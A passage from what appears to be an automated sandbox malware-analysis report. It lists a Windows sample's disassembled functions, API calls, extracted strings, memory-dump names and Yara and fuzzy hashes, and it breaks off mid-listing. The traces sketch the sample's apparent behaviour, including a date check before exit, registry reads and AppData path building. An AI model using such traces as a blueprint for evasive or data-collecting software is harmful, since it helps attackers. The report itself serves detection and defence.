                          Function 00721B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00721B72
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0072184F
                            • Part of subcall function 00721820: lstrlen.KERNEL32(010C6148), ref: 00721860
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,00000000), ref: 00721887
                            • Part of subcall function 00721820: lstrcat.KERNEL32(00000000,00000000), ref: 00721892
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,00000000), ref: 007218C1
                            • Part of subcall function 00721820: lstrlen.KERNEL32(00734FA0), ref: 007218D3
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,00000000), ref: 007218F4
                            • Part of subcall function 00721820: lstrcat.KERNEL32(00000000,00734FA0), ref: 00721900
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,00000000), ref: 0072192F
                          • sscanf.NTDLL ref: 00721B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00721BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00721BC6
                          • ExitProcess.KERNEL32 ref: 00721BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: bc999d044b6a05d9deb3be7f9809565b41320ff8c172300e11bc1b6540ad2336
                          • Instruction ID: a72e306a96171eda5843b5b486d36efa9921afc478282e365b2e54050f06d0f7
                          • Opcode Fuzzy Hash: bc999d044b6a05d9deb3be7f9809565b41320ff8c172300e11bc1b6540ad2336
                          • Instruction Fuzzy Hash: 052102B1518301AF8344DF69D88496BBBF8FFD8214F408A1EF599C3220E774D5088BA2
                          Function 00723130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00723166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0072316D
                          • RegOpenKeyExA.ADVAPI32(80000002,010CB7E0,00000000,00020119,?), ref: 0072318C
                          • RegQueryValueExA.ADVAPI32(?,010DD288,00000000,00000000,00000000,000000FF), ref: 007231A7
                          • RegCloseKey.ADVAPI32(?), ref: 007231B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: c704cb7ef7258fb421fbd1046fa622b00912aa8257e6ddde8ff3b357df627b3b
                          • Instruction ID: cef42bd363004863cef235099e145c74cc791e73a3b708bd4363957f66f63a74
                          • Opcode Fuzzy Hash: c704cb7ef7258fb421fbd1046fa622b00912aa8257e6ddde8ff3b357df627b3b
                          • Instruction Fuzzy Hash: 67114276A54319AFD714CF94EC45FABB7BCF744711F004129FA05D3680DB7559048BA1
                          Function 00708980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00708996
                            • Part of subcall function 0072A1C0: std::exception::exception.LIBCMT ref: 0072A1D5
                            • Part of subcall function 0072A1C0: std::exception::exception.LIBCMT ref: 0072A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 007089CD
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: da2614cd5db622988f89f0ef89f7b757bf1f4842607a10def960a20a5090c715
                          • Instruction ID: 31f8cb3d3c7223b34def2472d2898ad82988f936f25905851709c7f9ad31ec44
                          • Opcode Fuzzy Hash: da2614cd5db622988f89f0ef89f7b757bf1f4842607a10def960a20a5090c715
                          • Instruction Fuzzy Hash: 1E21E6B2300650CBC7209A5CE840A6AF7E99BA1761B100B3FF1D1CB6C1DA75E841C3A7
                          Function 00708850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00708883
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 1c425c2018bb6f4f39accec924d5aabefaa4ae498f21ce49b40464417e81ab2a
                          • Instruction ID: 8f8b23ac98033af2504dfd78cd6a0371b1588aeeafc9c05b56c3a5520e8347a5
                          • Opcode Fuzzy Hash: 1c425c2018bb6f4f39accec924d5aabefaa4ae498f21ce49b40464417e81ab2a
                          • Instruction Fuzzy Hash: 9A3197B5E00515DFCB08DF58C8916ADBBB6EB88350F14C269E915AB385DB34AD01CB91
                          Function 00725910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725922
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: cb1fa7641a1c609004d8b7927dfe5bd69a681f226ada96b036b28066642ff628
                          • Instruction ID: 7225d8f5a9d90e79b5275bd14c83306643be219da56aef80699397ffee7cf20e
                          • Opcode Fuzzy Hash: cb1fa7641a1c609004d8b7927dfe5bd69a681f226ada96b036b28066642ff628
                          • Instruction Fuzzy Hash: D5117C70304B60CBD7218B2CF800B1AB7E5AB91760F250A9AE0D187696D779E981C7A1
                          Function 00723CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0072A430,000000FF), ref: 00723D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00723D27
                          • wsprintfA.USER32 ref: 00723D37
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: b6191b8191cc31a792a35b661aaab1ce3d7c514133b0dd4b26fd5619e00d7d4c
                          • Instruction ID: 16683d9093a940e830dc723d86bbe6cf10e4d01f02819b47ccd6d5a6e8922fc4
                          • Opcode Fuzzy Hash: b6191b8191cc31a792a35b661aaab1ce3d7c514133b0dd4b26fd5619e00d7d4c
                          • Instruction Fuzzy Hash: F401C071A48714BBE7145B54DC4AF6ABB68FB45B61F100115FA059B2D0C7B81900CAA1
                          Function 00708710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00708737
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 8ce0f0dea95d200d2b37c9f807d17ce1d198b79eeb0de9d80a54f005f0b1192e
                          • Instruction ID: 16776478d2ef695b8203483186655d0caabce4dea38bfd6256908c3f2201ebfc
                          • Opcode Fuzzy Hash: 8ce0f0dea95d200d2b37c9f807d17ce1d198b79eeb0de9d80a54f005f0b1192e
                          • Instruction Fuzzy Hash: ACF0F023B000318FC384A47D8C8405EA88657E039033AE721E88AEF2DEEC34EC8281D2
                          Function 007286D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0072781C: __mtinitlocknum.LIBCMT ref: 00727832
                            • Part of subcall function 0072781C: __amsg_exit.LIBCMT ref: 0072783E
                          • ___addlocaleref.LIBCMT ref: 00728756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$Xus$xts
                          • API String ID: 3105635775-3376021188
                          • Opcode ID: 0f8247b74cd3ed6ff7b31dd7e242d7af03a4b03e281112f02aa792e7463ffc42
                          • Instruction ID: d681c3e88081f6c8ae7f811e0ae55264787cab1e2032aca39b7a065570ec1338
                          • Opcode Fuzzy Hash: 0f8247b74cd3ed6ff7b31dd7e242d7af03a4b03e281112f02aa792e7463ffc42
                          • Instruction Fuzzy Hash: 4601C4B1445710DEE724AFB9E809709B7E0AF10324F20990DE0D6573E1CFB8AA04CB11
                          Function 0071E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                          Download Yara Rule
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071E544
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E573
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E581
                          • lstrcat.KERNEL32(?,010DD508), ref: 0071E59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: d074d3f1147c00e15b67d14b138e0e79b20bef0069269755bc5bd22ed9daf21e
                          • Instruction ID: 5ebf1cedc4d6931c054c7b9dd4c4ecb062e8abc43e3f841b9de5a71256ba2aa1
                          • Opcode Fuzzy Hash: d074d3f1147c00e15b67d14b138e0e79b20bef0069269755bc5bd22ed9daf21e
                          • Instruction Fuzzy Hash: 6451AAB6A10108EBC755EB58DC4AEEE73BDFB48300F444568BD0597281DE74AE858F90
                          Function 00721FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00721FDF, 00721FF5, 007220B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
